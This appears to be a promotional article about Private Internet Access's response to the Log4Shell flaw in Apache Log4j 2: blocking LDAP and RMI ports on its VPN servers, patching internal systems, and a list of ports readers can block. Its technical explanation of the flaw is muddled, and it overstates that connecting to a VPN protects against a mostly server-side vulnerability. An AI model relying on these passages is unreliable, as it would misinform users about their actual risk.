On December 9, 2021, a zero-day vulnerability was disclosed in the Apache library in one of its Java-logging frameworks – Log4j 2, with the vulnerability being named “Log4Shell”. Cybersecurity experts are correctly calling this a massive, critical-level threat, and even the “single biggest, most critical vulnerability of the last decade.”
Since the threat was disclosed, many VPN companies started working round the clock to mitigate the negative effects this exploit could have. Private Internet Access (PIA) is one of them, and it has come up with a patch that can not only protect its users from exploits but can also help protect PIA’s VPN users from the Log4j 2 vulnerability altogether.
To that end, PIA has issued an update to its VPN infrastructure that now protects all PIA users against most Log4Shell exploits while they’re connected to the VPN.
PIA blocked traffic to the Lightweight Directory Access Protocol (LDAP)
The Log4Shell exploit has been found to primarily use certain ports of the networking protocol LDAP. Considering that the LDAP traffic can be simply blocked from going through a VPN, PIA decided that not only is this a practical solution to overcome the main Log4Shell exploit, but that it’s their duty as a network-based security service to do so.
By blocking LDAP traffic, an attacker can no longer force the user’s device to connect to a suspicious LDAP server and load the malicious code used in the exploit. To achieve this, PIA implemented firewalls across all of its VPN servers that block certain LDAP ports known to be used in the attacks.
As a result, most Log4Shell exploits are blocked at the network level, ensuring that no malicious code can be sent via these attack vectors.
However, PIA added that this is not a foolproof, long-term solution, and you as a user should focus on upgrading any Java application that you are currently using on your device for complete Log4Shell protection. The full list of vulnerable applications is available from this page.
PIA is also taking extra security measures to guarantee internal safety
In addition, the PIA team has also taken extra security measures to make sure its internal systems stay rock solid. Specifically, it has:
- Updated all affected infrastructure to their latest OS versions and applied all security patches.
- Updated all affected internal tools to their latest versions, including fixes for the Log4j vulnerability.
- Audited and patched all affected docker images, including fixes for the Log4j vulnerability.
- Patched all server fleets against the Log4j vulnerability, including releasing the LDAP fix by blocking a series of ports most commonly used by the LDAP protocol.
A word about Log4j 2 & Log4Shell
This is somewhat technical, but considering the wide reach this exploit can potentially have – we think it’s worth knowing.
Apache Log4j 2 is a Java-logging package that creates and saves log reports, like when someone sends an error report to a developer to help them debug a misbehaving application. This is a typical function of the Java-logging code, and it has no privacy-based risks associated with it.
However, the Log4Shell vulnerability allows an attacker to create a log that’s saved locally on your device while being able to connect to an additional server to get additional log content. By doing so, the attacker can retrieve logging data from your server, upload malware onto that server, and execute their malware locally on your device.
The problem is that Log4j 2 is integrated across the entirety of the web’s infrastructure, posing potentially risks for virtually all internet-connected services.
In fact, a successful exploit has already been used against Minecraft, as the simple sending of a chat message allowed the attacker to gain access to Minecraft’s servers. While this vulnerability has since been patched, there’s no way to tell what software has already been compromised and what software still remains vulnerable.
Moreover, Log4Shell attacks don’t need the victim to click any link or take any action – they can be executed easily and quickly, and virtually every type of malware can be loaded onto a user’s system.
But, as noted above, simply connecting to PIA’s VPN will now help protect against this vulnerability.
In conclusion, we will add that you should always have your systems and apps up to date so that the latest patches are implemented at all times. While you’re waiting for the majority of the Internet to do so, you can always connect to the internet using PIA’s or some other VPN.
Additionally, you can update your router and/or firewall settings to block traffic to ports associated with Log4Shell, like RMI – 1099 and LDAP – 389, 636, 1389, 3268, and 3269. These have been blocked on the PIA app, but for extra security – you can block them on your own firewall, as well.
Finally, PIA notes that no PIA user information or data has been compromised — as their engineers reacted promptly. Which is what we would expect from such a (great) VPN service.